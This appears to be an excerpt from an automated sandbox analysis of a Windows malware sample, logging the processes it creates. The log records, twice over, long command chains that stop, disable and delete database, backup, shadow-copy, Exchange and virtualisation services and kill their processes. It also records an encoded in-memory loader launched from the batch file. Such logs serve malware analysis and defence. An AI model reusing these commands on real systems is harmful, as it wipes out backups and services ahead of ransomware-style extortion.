        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM "UFSoft.U8.OC.QuartzScheduler.exe" /F
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM DDSoftPwsTomcat9.exe /F
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM U8SmartClient.exe /F
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM "UFSoft.U8.OC.QuartzScheduler.exe" /F
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM "UFSoft.U8.OC.QuartzScheduler.exe" /F
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\Desktop\R1TftmQpuQ.bat.exe "c:\users\user\desktop\r1tftmqpuq.bat".exe -win 1 -enc jablahgazqagad0aiabbafmaeqbzahqazqbtac4arabpageazwbuag8acwb0agkaywbzac4auabyag8aywblahmacwbdadoaogbhaguadabdahuacgbyaguabgb0afaacgbvagmazqbzahmakaapac4atqbhagkabgbnag8azab1agwazqauaeyaaqbsaguatgbhag0azqa7acaajabsaguabgagad0aiaakaguaeablac4atablag4azwb0aggaowakagwazqbuacaapqagacqabablag4aiaatacaanaa7acqavwblagiavabpahqabablacaapqagae4azqb3ac0atwbiagoazqbjahqaiaatafqaeqbwaguatgbhag0azqagafmaeqbzahqazqbtac4avablahgadaauafmadabyagkabgbnaeiadqbpagwazablahiaowagagyabwbyaguayqbjaggaiaaoacqababpag4azqagagkabgagafsauwb5ahmadablag0algbjae8algbgagkabablaf0aoga6afiazqbhagqatabpag4azqbzacgajablahgazqauafiazqbtag8adgblacgajabsaguabgapackakqagahsaiabpagyaiaaoacqababpag4azqagac0ababpagsazqagaccakgagak4akganackaiab7acaaiaakafcazqbiafqaaqb0agwazqauaeeacabwaguabgbkacgajabsagkabgblac4auwbwagwaaqb0acgajwcuaccakqbbadeaxqapacaafaagae8adqb0ac0atgb1agwabab9acaafqa7acaajabiahkadablahmaiaa9acaawwbtahkacwb0aguabqauaemabwbuahyazqbyahqaxqa6adoargbyag8abqbcageacwbladyanabtahqacgbpag4azwaoacqavwblagiavabpahqabablac4avabvafmadabyagkabgbnacgakqapadsajabpag4acab1ahqaiaa9acaatgblahcalqbpagiaagblagmadaagafmaeqbzahqazqbtac4asqbpac4atqblag0abwbyahkauwb0ahiazqbhag0akaagacwaiaakagiaeqb0aguacwagackaowakag8adqb0ahaadqb0acaapqagae4azqb3ac0atwbiagoazqbjahqaiabtahkacwb0aguabqauaekatwauae0azqbtag8acgb5afmadabyaguayqbtadsajabnahoaaqbwafmadabyaguayqbtacaapqagae4azqb3ac0atwbiagoazqbjahqaiabtahkacwb0aguabqauaekatwauaemabwbtahaacgblahmacwbpag8abgauaecaegbpahaauwb0ahiazqbhag0aiaakagkabgbwahuadaasacaakabbaekatwauaemabwbtahaacgblahmacwbpag8abgauaemabwbtahaacgblahmacwbpag8abgbnag8azablaf0aoga6aeqazqbjag8abqbwahiazqbzahmakqa7acqazwb6agkacabtahqacgblageabqauaemabwbwahkavabvacgaiaakag8adqb0ahaadqb0acaakqa7acqazwb6agkacabtahqacgblageabqauaemababvahmazqaoackaowakagkabgbwahuadaauaemababvahmazqaoackaowbbagiaeqb0aguawwbdaf0aiaakagiaeqb0aguacwagad0aiaakag8adqb0ahaadqb0ac4avabvaeeacgbyageaeqaoackaowbbaeeacgbyageaeqbdadoaogbsaguadgblahiacwblacgajabiahkadablahmakqa7acaajabhahmacwblag0aygbsahkaiaa9acaawwbtahkacwb0aguabqauafiazqbmagwazqbjahqaaqbvag4algbbahmacwblag0aygbsahkaxqa6adoatabvageazaaoacqaygb5ahqazqbzackaowagacqazqbuahqacgb5afaabwbpag4adabnaguadaboag8azaagad0aiaakageacwbzaguabqbiagwaeqauaecazqb0afqaeqbwaguacwaoackalgbxaggazqbyaguakab7acaajabfac4atgbhag0azqagac0azqbxacaajwbxahiazwb2agcacabyaccaiab9acwaiaanaeyaaqbyahmadaanackalgbhaguadabnaguadaboag8azaaoaccatqbhagkabganacwaiabbafiazqbmagwazqbjahqaaqbvag4algbcagkabgbkagkabgbnaeyababhagcacwbdacaajwbtahqayqb0agkaywasacaauab1agiababpagmalaagae4abwbuafaadqbiagwaaqbjaccakqa7acaajablag4adabyahkauabvagkabgb0ae0azqb0aggabwbkac4asqbuahyabwbraguakaakag4adqbsagwalaagacqabgb1agwabaapacaafaagae8adqb0ac0atgb1agwabaa=
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c "color b & net stop "sqlserveragent" & net stop "sqlbrowser" & net stop "sqltelemetry" & net stop "msdtsserver130" & net stop "ssistelemetry130" & net stop "sqlwrite" & net stop "mssql$veeamsql2012" & net stop "sqlagent$veeamsql2012" & net stop "mssql" & net stop "sqlagent" & net stop "mssqlserveradhelper100" & net stop "mssqlserverolapservice" & net stop "msdtsserver100" & net stop "reportserver" & net stop "sqltelemetry$hl" & net stop "tmbmserver" & net stop "mssql$progid" & net stop "mssql$wolterskluwer" & net stop "sqlagent$progid" & net stop "sqlagent$wolterskluwer" & net stop "mssqlfdlauncher$optima" & net stop "mssql$optima" & net stop "sqlagent$optima" & net stop "reportserver$optima" & net stop "msftesql$sqlexpress" & net stop "postgresql-x64-9.4" & sc config "mssqlfdlauncher" start= disabled & sc config "sqlserveragent" start= disabled & sc config "sqlbrowser" start= disabled"
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess created: C:\Windows\SysWOW64\cmd.exe "c:\windows\system32\cmd.exe" /c sc delete "mssqlfdlauncher"&&sc delete "mssqlserver"&&sc delete "sqlserveragent"&&sc delete "sqlbrowser"&&sc delete "sqltelemetry"&&sc delete "msdtsserver130"&&sc delete "ssistelemetry130"&&sc delete "sqlwriter"&&sc delete "mssql$veeamsql2012"&&sc delete "sqlagent$veeamsql2012"&&sc delete "mssql"&&sc delete "sqlagent"&&sc delete "mssqlserveradhelper100"&&sc delete "mssqlserverolapservice"&&sc delete "msdtsserver100"&&sc delete "reportserver"&&sc delete "sqltelemetry$hl"&&sc delete "tmbmserver"&&sc delete "mssql$progid"&&sc delete "mssql$wolterskluwer"&&sc delete "sqlagent$progid"&&sc delete "sqlagent$wolterskluwer"&&sc delete "mssqlfdlauncher$optima"&&sc delete "mssql$optima"&&sc delete "sqlagent$optima"&&sc delete "reportserver$optima"&&sc delete "msftesql$sqlexpress"&&sc delete "postgresql-x64-9.4"&&rem kill "sql"&&taskkill -f -im sqlbrowser.exe&&taskkill -f -im sqlwriter.exe&&taskkill -f -im sqlservr.exe&&taskkill -f -im msmdsrv.exe&&taskkill -f -im msdtssrvr.exe&&taskkill -f -im sqlceip.exe&&taskkill -f -im fdlauncher.exe&&taskkill -f -im ssms.exe&&taskkill -f -im sqlagent.exe&&taskkill -f -im fdhost.exe&&taskkill -f -im fdlauncher.exe&&taskkill -f -im sqlservr.exe&&taskkill -f -im reportingservicesservice.exe&&taskkill -f -im msftesql.exe&&taskkill -f -im pg_ctl.exe&&taskkill -f -im postgres.exe
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c "color b & sc config mssqlserver start=disabled & sc config "sql server (mssqlserver)" start=disabled & net stop mssql$ & sc config mssql$ start=disabled & net stop sqlserveragent & sc config sqlserveragent start=disabled & net stop sqlbrowser & sc config sqlbrowser start=disabled & net stop vss & sc config vss start=disabled & net stop sqlwriter & sc config sqlwriter start=disabled & net stop vmvss & sc config vmvss start=disabled & sc config mssql$fe_express start= disabled & net stop mssql$re_express & net stop sqlanys_sage_fas_fixed_assets & sc config sqlanys_sage_fas_fixed_assets start=disabled & net stop mssql$vim_sqlexp & sc config mssql$vim_sqlexp start=disabled & net stop "mssqlfdlauncher" & net stop "mssqlserver""
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c "color b & taskkill /f /im veeam.backup.agent.configurationservice.exe & taskkill /f /im veeam.backup.brokerservice.exe & taskkill /f /im veeam.backup.catalogdataservice.exe & taskkill /f /im veeam.backup.cloudservice.exe & taskkill /f /im veeam.backup.manager.exe & taskkill /f /im veeam.backup.mountservice.exe & taskkill /f /im veeam.backup.service.exe & taskkill /f /im veeam.backup.wmiserver.exe & taskkill /f /im veeam.guest.interaction.proxy.exe & taskkill /f /im veeamdeploymentsvc.exe & taskkill /f /im veeamnfssvc.exe & taskkill /f /im veeamtransportsvc.exe & taskkill /f /im sqlbrowser.exe & taskkill /f /im sqlceip.exe & taskkill /f /im sqlservr.exe & taskkill /f /im sqlwriter.exe & taskkill /f /im sqlagentc.exe & taskkill /f /im reportingservicesservice.exe & taskkill /f /im ssms.exe & taskkill /f /im fdhost.exe & taskkill /f /im fdlauncher.exe & taskkill /f /im msdtssrvr.exe & taskkill /f /im msmdsrv.exe & taskkill /f /im mysql.exe & taskkill /f /im mysqld.exe & taskkill /f /im w3wp.exe & taskkill /f /im wsusservice.exe & taskkill /f /im sagecsclient.exe & taskkill /f /im ufsoft.u8.oc.quartzscheduler.exe & taskkill /f /im launchpad.exe & taskkill /f /im dbsrv12.exe & taskkill /f /im excel.exe & taskkill /f /im outlook.exe & taskkill /f /im winword.exe & taskkill /f /im onedrive.exe & taskkill /f /im taskservice.exe"
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c "color b & net stop "msolap$shopcontrol9" & net stop "mssql$shopcontrol9" & net stop "mssqlfdlauncher$shopcontrol9" & net stop "reportserver$shopcontrol9" & net stop "sqlagent$shopcontrol9" & net stop "netbackup client service" & net stop "netbackup discovery framework" & net stop "netbackup legacy client service" & net stop "netbackup legacy network service" & net stop "netbackup proxy service" & net stop "netbackup san client fibre transport service" & taskkill /im mysqld-nt.exe /f & taskkill /im nfvprint.exe /f & taskkill /im licenceserver.exe /f & taskkill /im launchpad.exe /f & taskkill /f /im "filezilla server.exe" & taskkill /f /im cbservice.exe & taskkill /f /im cbinterface.exe & taskkill /f /im pvxwin32.exe & taskkill /f /im pvxwin64.exe & taskkill /f /im pvxcom.exe & taskkill /f /im pvxiosvr.exe & taskkill /f /im sage.na.at_au.systray.exe & taskkill /f /im sage.na.at_au.service.exe"
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c "color b & @taskkill /im tomcat7w.exe /f & @taskkill /im "ufsoft.u8.oc.quartzscheduler.exe" /f & @taskkill /im ufsoft.u8.oc.quartzscheduler.exe /f & @taskkill /im launchpad.exe /f & @taskkill /im mpdwsvc.exe /f & @taskkill /im cbvscservice11.exe /f & @taskkill /im cbservice.exe /f & @sc delete cobianbackup11 & @sc delete cbvscservice11 & @taskkill /im mysqld-nt.exe /f & @taskkill /im "kingdee.k3.crm.mmc.autoservice.exe" /f & @taskkill /im sqlceip.exe /f & @taskkill /im "microsoft.sqlserver.integrationservices.masterservicehost.exe" /f & taskkill /f /im store.exe & taskkill /f /im msexchangemailboxreplication.exe & taskkill /f /im microsoft.exchange.protectedservicehost.exe & taskkill /f /im msexchangethrottling.exe & taskkill /f /im edgetransport.exe & taskkill /f /im msexchangetransportlogsearch.exe & taskkill /f /im microsoft.exchange.rpcclientaccess.service.exe & taskkill /f /im microsoft.exchange.addressbook.service.exe & taskkill /f /im datacollectorsvc.exe & taskkill /f /im microsoft.exchange.servicehost.exe & taskkill /f /im microsoft.exchange.contentfilter.wrapper.exe & taskkill /f /im msexchangemailboxassistants.exe & taskkill /f /im msexchangerepl.exe & taskkill /f /im microsoft.exchange.search.exsearch.exe & taskkill /f /im microsoft.exchange.edgesyncsvc.exe & taskkill /f /im msexchangefds.exe & taskkill /f /im msexchangemailsubmission.exe & taskkill /f /im msexchangetransport.exe & taskkill /f /im microsoft.exchange.antispamupdatesvc.exe"
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c "color b & @taskkill /im ddsoftpwstomcat9.exe /f & @taskkill /im u8smartclient.exe /f & @taskkill /im u8smartclientmonitor.exe /f & @taskkill /im tomcat9.exe /f & @taskkill /im sqlmanagement.exe /f & @sc delete "siebelapplicationcontainer_siebel_home_d_siebel_sai" & @taskkill /im reportingservicesservice.exe /f & @sc delete "reportserver$sqlexpress" & @sc delete tongbackupsrv & @taskkill /im tongbackupsrv.exe /f & @taskkill /im ufmsgcenterservice.exe /f & @taskkill /im "cobian.exe" /f & @taskkill /im "sap business one.exe" /f & @net stop "sqlbackupandftp client service" & @taskkill /im "sqlbak.service.exe" /f & @net stop cbvscservice & @net stop "sap business one rsp agent service" & @net stop sapb1idiproxy & @net stop "sapb1idiproxy_monitor" & @net stop sapb1ieventsender & @net stop sboclientagent & @net stop sbodi_server & @net stop sbojobservicebackend & @net stop sbomail & @net stop sbowfdataaccess & @net stop sboworkflowuser"
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c "color b & @sc delete "xt800service_personal" & @sc delete sqlserveragent & @sc delete sqlwriter & @sc delete sqlbrowser & @sc delete mssqlfdlauncher & @sc delete mssqlserver & @sc delete qcsoftservice & @sc delete mssqlserverolapservice & @sc delete vmtools & @sc delete vgauthservice & @sc delete msdtc & @sc delete teamviewer & @sc delete reportserver & @sc delete rabbitmq & @sc delete "ahs service" & @sc delete "sense shield service" & @sc delete ssmonitorservice & @sc delete sssyncservice & @sc delete tplusstdappservice1300 & @sc delete mssql$sql2008 & @sc delete sqlagent$sql2008 & @sc delete tplusstdtaskservice1300 & @sc delete tplusstdupgradeservice1300 & @sc delete virboxwebserver & @sc delete jhi_service & @sc delete lms & @sc delete "fontcache3.0.0.0" & @sc delete "osp service""
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c "color b & @sc delete "daservice_tcp" & @sc delete "ecard-ttransserver" & @sc delete ecardmpservice & @sc delete energydataservice & @sc delete ui0detect & @sc delete k3mobileservice & @sc delete tcpiddaservice & @sc delete webattendserver & @sc delete uiodetect & @sc delete "wanxiao-monitor" & @sc delete vmauthdservice & @sc delete vmusbarbservice & @sc delete vmwarehostd & @sc delete "vm-agent" & @sc delete vmagentdaemon & @sc delete opensshd & @sc delete esightservice & @sc delete apachezt & @sc delete jenkins & @sc delete secbizsrv & @sc delete sqltelemetry & @sc delete msmq & @sc delete smtpsvrjt & @sc delete zyb_sync & @sc delete 360enthttpserver & @sc delete 360entsvc & @sc delete 360entclientsvc & @sc delete nfwebserver & @sc delete wampapache & @sc delete mssearch & @sc delete msftesql & @sc delete "syncbase service" & @sc delete oracledbconcoleorcl & @sc delete oraclejobschedulerorcl & @sc delete oraclemtsrecoveryservice"
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c "color b & @sc delete oracleoradb11g_home1clragent & @sc delete oracleoradb11g_home1tnslistener & @sc delete oraclevsswriterorcl & @sc delete oracleserviceorcl & @sc delete aspnet_state @sc delete redis & @sc delete oraclevsswriterorcl & @sc delete jhtask & @sc delete imedictupdateservice & @sc delete xt800service_personal & @sc delete mcservice & @sc delete imedictupdateservice & @sc delete allpass_redisservice_port21160 & @sc delete "flash helper service" & @sc delete "kiwi syslog server" & @sc delete "uws hipriv services" & net stop mssql$fe_express"
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\Desktop\R1TftmQpuQ.bat.exe "c:\users\user\desktop\r1tftmqpuq.bat".exe -win 1 -enc jablahgazqagad0aiabbafmaeqbzahqazqbtac4arabpageazwbuag8acwb0agkaywbzac4auabyag8aywblahmacwbdadoaogbhaguadabdahuacgbyaguabgb0afaacgbvagmazqbzahmakaapac4atqbhagkabgbnag8azab1agwazqauaeyaaqbsaguatgbhag0azqa7acaajabsaguabgagad0aiaakaguaeablac4atablag4azwb0aggaowakagwazqbuacaapqagacqabablag4aiaatacaanaa7acqavwblagiavabpahqabablacaapqagae4azqb3ac0atwbiagoazqbjahqaiaatafqaeqbwaguatgbhag0azqagafmaeqbzahqazqbtac4avablahgadaauafmadabyagkabgbnaeiadqbpagwazablahiaowagagyabwbyaguayqbjaggaiaaoacqababpag4azqagagkabgagafsauwb5ahmadablag0algbjae8algbgagkabablaf0aoga6afiazqbhagqatabpag4azqbzacgajablahgazqauafiazqbtag8adgblacgajabsaguabgapackakqagahsaiabpagyaiaaoacqababpag4azqagac0ababpagsazqagaccakgagak4akganackaiab7acaaiaakafcazqbiafqaaqb0agwazqauaeeacabwaguabgbkacgajabsagkabgblac4auwbwagwaaqb0acgajwcuaccakqbbadeaxqapacaafaagae8adqb0ac0atgb1agwabab9acaafqa7acaajabiahkadablahmaiaa9acaawwbtahkacwb0aguabqauaemabwbuahyazqbyahqaxqa6adoargbyag8abqbcageacwbladyanabtahqacgbpag4azwaoacqavwblagiavabpahqabablac4avabvafmadabyagkabgbnacgakqapadsajabpag4acab1ahqaiaa9acaatgblahcalqbpagiaagblagmadaagafmaeqbzahqazqbtac4asqbpac4atqblag0abwbyahkauwb0ahiazqbhag0akaagacwaiaakagiaeqb0aguacwagackaowakag8adqb0ahaadqb0acaapqagae4azqb3ac0atwbiagoazqbjahqaiabtahkacwb0aguabqauaekatwauae0azqbtag8acgb5afmadabyaguayqbtadsajabnahoaaqbwafmadabyaguayqbtacaapqagae4azqb3ac0atwbiagoazqbjahqaiabtahkacwb0aguabqauaekatwauaemabwbtahaacgblahmacwbpag8abgauaecaegbpahaauwb0ahiazqbhag0aiaakagkabgbwahuadaasacaakabbaekatwauaemabwbtahaacgblahmacwbpag8abgauaemabwbtahaacgblahmacwbpag8abgbnag8azablaf0aoga6aeqazqbjag8abqbwahiazqbzahmakqa7acqazwb6agkacabtahqacgblageabqauaemabwbwahkavabvacgaiaakag8adqb0ahaadqb0acaakqa7acqazwb6agkacabtahqacgblageabqauaemababvahmazqaoackaowakagkabgbwahuadaauaemababvahmazqaoackaowbbagiaeqb0aguawwbdaf0aiaakagiaeqb0aguacwagad0aiaakag8adqb0ahaadqb0ac4avabvaeeacgbyageaeqaoackaowbbaeeacgbyageaeqbdadoaogbsaguadgblahiacwblacgajabiahkadablahmakqa7acaajabhahmacwblag0aygbsahkaiaa9acaawwbtahkacwb0aguabqauafiazqbmagwazqbjahqaaqbvag4algbbahmacwblag0aygbsahkaxqa6adoatabvageazaaoacqaygb5ahqazqbzackaowagacqazqbuahqacgb5afaabwbpag4adabnaguadaboag8azaagad0aiaakageacwbzaguabqbiagwaeqauaecazqb0afqaeqbwaguacwaoackalgbxaggazqbyaguakab7acaajabfac4atgbhag0azqagac0azqbxacaajwbxahiazwb2agcacabyaccaiab9acwaiaanaeyaaqbyahmadaanackalgbhaguadabnaguadaboag8azaaoaccatqbhagkabganacwaiabbafiazqbmagwazqbjahqaaqbvag4algbcagkabgbkagkabgbnaeyababhagcacwbdacaajwbtahqayqb0agkaywasacaauab1agiababpagmalaagae4abwbuafaadqbiagwaaqbjaccakqa7acaajablag4adabyahkauabvagkabgb0ae0azqb0aggabwbkac4asqbuahyabwbraguakaakag4adqbsagwalaagacqabgb1agwabaapacaafaagae8adqb0ac0atgb1agwabaa=Jump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c "color b & net stop "sqlserveragent" & net stop "sqlbrowser" & net stop "sqltelemetry" & net stop "msdtsserver130" & net stop "ssistelemetry130" & net stop "sqlwrite" & net stop "mssql$veeamsql2012" & net stop "sqlagent$veeamsql2012" & net stop "mssql" & net stop "sqlagent" & net stop "mssqlserveradhelper100" & net stop "mssqlserverolapservice" & net stop "msdtsserver100" & net stop "reportserver" & net stop "sqltelemetry$hl" & net stop "tmbmserver" & net stop "mssql$progid" & net stop "mssql$wolterskluwer" & net stop "sqlagent$progid" & net stop "sqlagent$wolterskluwer" & net stop "mssqlfdlauncher$optima" & net stop "mssql$optima" & net stop "sqlagent$optima" & net stop "reportserver$optima" & net stop "msftesql$sqlexpress" & net stop "postgresql-x64-9.4" & sc config "mssqlfdlauncher" start= disabled & sc config "sqlserveragent" start= disabled & sc config "sqlbrowser" start= disabled"Jump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c "color b & sc config mssqlserver start=disabled & sc config "sql server (mssqlserver)" start=disabled & net stop mssql$ & sc config mssql$ start=disabled & net stop sqlserveragent & sc config sqlserveragent start=disabled & net stop sqlbrowser & sc config sqlbrowser start=disabled & net stop vss & sc config vss start=disabled & net stop sqlwriter & sc config sqlwriter start=disabled & net stop vmvss & sc config vmvss start=disabled & sc config mssql$fe_express start= disabled & net stop mssql$re_express & net stop sqlanys_sage_fas_fixed_assets & sc config sqlanys_sage_fas_fixed_assets start=disabled & net stop mssql$vim_sqlexp & sc config mssql$vim_sqlexp start=disabled & net stop "mssqlfdlauncher" & net stop "mssqlserver""Jump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c "color b & taskkill /f /im veeam.backup.agent.configurationservice.exe & taskkill /f /im veeam.backup.brokerservice.exe & taskkill /f /im veeam.backup.catalogdataservice.exe & taskkill /f /im veeam.backup.cloudservice.exe & taskkill /f /im veeam.backup.manager.exe & taskkill /f /im veeam.backup.mountservice.exe & taskkill /f /im veeam.backup.service.exe & taskkill /f /im veeam.backup.wmiserver.exe & taskkill /f /im veeam.guest.interaction.proxy.exe & taskkill /f /im veeamdeploymentsvc.exe & taskkill /f /im veeamnfssvc.exe & taskkill /f /im veeamtransportsvc.exe & taskkill /f /im sqlbrowser.exe & taskkill /f /im sqlceip.exe & taskkill /f /im sqlservr.exe & taskkill /f /im sqlwriter.exe & taskkill /f /im sqlagentc.exe & taskkill /f /im reportingservicesservice.exe & taskkill /f /im ssms.exe & taskkill /f /im fdhost.exe & taskkill /f /im fdlauncher.exe & taskkill /f /im msdtssrvr.exe & taskkill /f /im msmdsrv.exe & taskkill /f /im mysql.exe & taskkill /f /im mysqld.exe & taskkill /f /im w3wp.exe & taskkill /f /im wsusservice.exe & taskkill /f /im sagecsclient.exe & taskkill /f /im ufsoft.u8.oc.quartzscheduler.exe & taskkill /f /im launchpad.exe & taskkill /f /im dbsrv12.exe & taskkill /f /im excel.exe & taskkill /f /im outlook.exe & taskkill /f /im winword.exe & taskkill /f /im onedrive.exe & taskkill /f /im taskservice.exe"Jump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c "color b & net stop "msolap$shopcontrol9" & net stop "mssql$shopcontrol9" & net stop "mssqlfdlauncher$shopcontrol9" & net stop "reportserver$shopcontrol9" & net stop "sqlagent$shopcontrol9" & net stop "netbackup client service" & net stop "netbackup discovery framework" & net stop "netbackup legacy client service" & net stop "netbackup legacy network service" & net stop "netbackup proxy service" & net stop "netbackup san client fibre transport service" & taskkill /im mysqld-nt.exe /f & taskkill /im nfvprint.exe /f & taskkill /im licenceserver.exe /f & taskkill /im launchpad.exe /f & taskkill /f /im "filezilla server.exe" & taskkill /f /im cbservice.exe & taskkill /f /im cbinterface.exe & taskkill /f /im pvxwin32.exe & taskkill /f /im pvxwin64.exe & taskkill /f /im pvxcom.exe & taskkill /f /im pvxiosvr.exe & taskkill /f /im sage.na.at_au.systray.exe & taskkill /f /im sage.na.at_au.service.exe"Jump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c "color b & @taskkill /im tomcat7w.exe /f & @taskkill /im "ufsoft.u8.oc.quartzscheduler.exe" /f & @taskkill /im ufsoft.u8.oc.quartzscheduler.exe /f & @taskkill /im launchpad.exe /f & @taskkill /im mpdwsvc.exe /f & @taskkill /im cbvscservice11.exe /f & @taskkill /im cbservice.exe /f & @sc delete cobianbackup11 & @sc delete cbvscservice11 & @taskkill /im mysqld-nt.exe /f & @taskkill /im "kingdee.k3.crm.mmc.autoservice.exe" /f & @taskkill /im sqlceip.exe /f & @taskkill /im "microsoft.sqlserver.integrationservices.masterservicehost.exe" /f & taskkill /f /im store.exe & taskkill /f /im msexchangemailboxreplication.exe & taskkill /f /im microsoft.exchange.protectedservicehost.exe & taskkill /f /im msexchangethrottling.exe & taskkill /f /im edgetransport.exe & taskkill /f /im msexchangetransportlogsearch.exe & taskkill /f /im microsoft.exchange.rpcclientaccess.service.exe & taskkill /f /im microsoft.exchange.addressbook.service.exe & taskkill /f /im datacollectorsvc.exe & taskkill /f /im microsoft.exchange.servicehost.exe & taskkill /f /im microsoft.exchange.contentfilter.wrapper.exe & taskkill /f /im msexchangemailboxassistants.exe & taskkill /f /im msexchangerepl.exe & taskkill /f /im microsoft.exchange.search.exsearch.exe & taskkill /f /im microsoft.exchange.edgesyncsvc.exe & taskkill /f /im msexchangefds.exe & taskkill /f /im msexchangemailsubmission.exe & taskkill /f /im msexchangetransport.exe & taskkill /f /im microsoft.exchange.antispamupdatesvc.exe"Jump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c "color b & @taskkill /im ddsoftpwstomcat9.exe /f & @taskkill /im u8smartclient.exe /f & @taskkill /im u8smartclientmonitor.exe /f & @taskkill /im tomcat9.exe /f & @taskkill /im sqlmanagement.exe /f & @sc delete "siebelapplicationcontainer_siebel_home_d_siebel_sai" & @taskkill /im reportingservicesservice.exe /f & @sc delete "reportserver$sqlexpress" & @sc delete tongbackupsrv & @taskkill /im tongbackupsrv.exe /f & @taskkill /im ufmsgcenterservice.exe /f & @taskkill /im "cobian.exe" /f & @taskkill /im "sap business one.exe" /f & @net stop "sqlbackupandftp client service" & @taskkill /im "sqlbak.service.exe" /f & @net stop cbvscservice & @net stop "sap business one rsp agent service" & @net stop sapb1idiproxy & @net stop "sapb1idiproxy_monitor" & @net stop sapb1ieventsender & @net stop sboclientagent & @net stop sbodi_server & @net stop sbojobservicebackend & @net stop sbomail & @net stop sbowfdataaccess & @net stop sboworkflowuser"Jump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c "color b & @sc delete "xt800service_personal" & @sc delete sqlserveragent & @sc delete sqlwriter & @sc delete sqlbrowser & @sc delete mssqlfdlauncher & @sc delete mssqlserver & @sc delete qcsoftservice & @sc delete mssqlserverolapservice & @sc delete vmtools & @sc delete vgauthservice & @sc delete msdtc & @sc delete teamviewer & @sc delete reportserver & @sc delete rabbitmq & @sc delete "ahs service" & @sc delete "sense shield service" & @sc delete ssmonitorservice & @sc delete sssyncservice & @sc delete tplusstdappservice1300 & @sc delete mssql$sql2008 & @sc delete sqlagent$sql2008 & @sc delete tplusstdtaskservice1300 & @sc delete tplusstdupgradeservice1300 & @sc delete virboxwebserver & @sc delete jhi_service & @sc delete lms & @sc delete "fontcache3.0.0.0" & @sc delete "osp service""Jump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c "color b & @sc delete "daservice_tcp" & @sc delete "ecard-ttransserver" & @sc delete ecardmpservice & @sc delete energydataservice & @sc delete ui0detect & @sc delete k3mobileservice & @sc delete tcpiddaservice & @sc delete webattendserver & @sc delete uiodetect & @sc delete "wanxiao-monitor" & @sc delete vmauthdservice & @sc delete vmusbarbservice & @sc delete vmwarehostd & @sc delete "vm-agent" & @sc delete vmagentdaemon & @sc delete opensshd & @sc delete esightservice & @sc delete apachezt & @sc delete jenkins & @sc delete secbizsrv & @sc delete sqltelemetry & @sc delete msmq & @sc delete smtpsvrjt & @sc delete zyb_sync & @sc delete 360enthttpserver & @sc delete 360entsvc & @sc delete 360entclientsvc & @sc delete nfwebserver & @sc delete wampapache & @sc delete mssearch & @sc delete msftesql & @sc delete "syncbase service" & @sc delete oracledbconcoleorcl & @sc delete oraclejobschedulerorcl & @sc delete oraclemtsrecoveryservice"Jump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c "color b & @sc delete oracleoradb11g_home1clragent & @sc delete oracleoradb11g_home1tnslistener & @sc delete oraclevsswriterorcl & @sc delete oracleserviceorcl & @sc delete aspnet_state @sc delete redis & @sc delete oraclevsswriterorcl & @sc delete jhtask & @sc delete imedictupdateservice & @sc delete xt800service_personal & @sc delete mcservice & @sc delete imedictupdateservice & @sc delete allpass_redisservice_port21160 & @sc delete "flash helper service" & @sc delete "kiwi syslog server" & @sc delete "uws hipriv services" & net stop mssql$fe_express"Jump to behavior
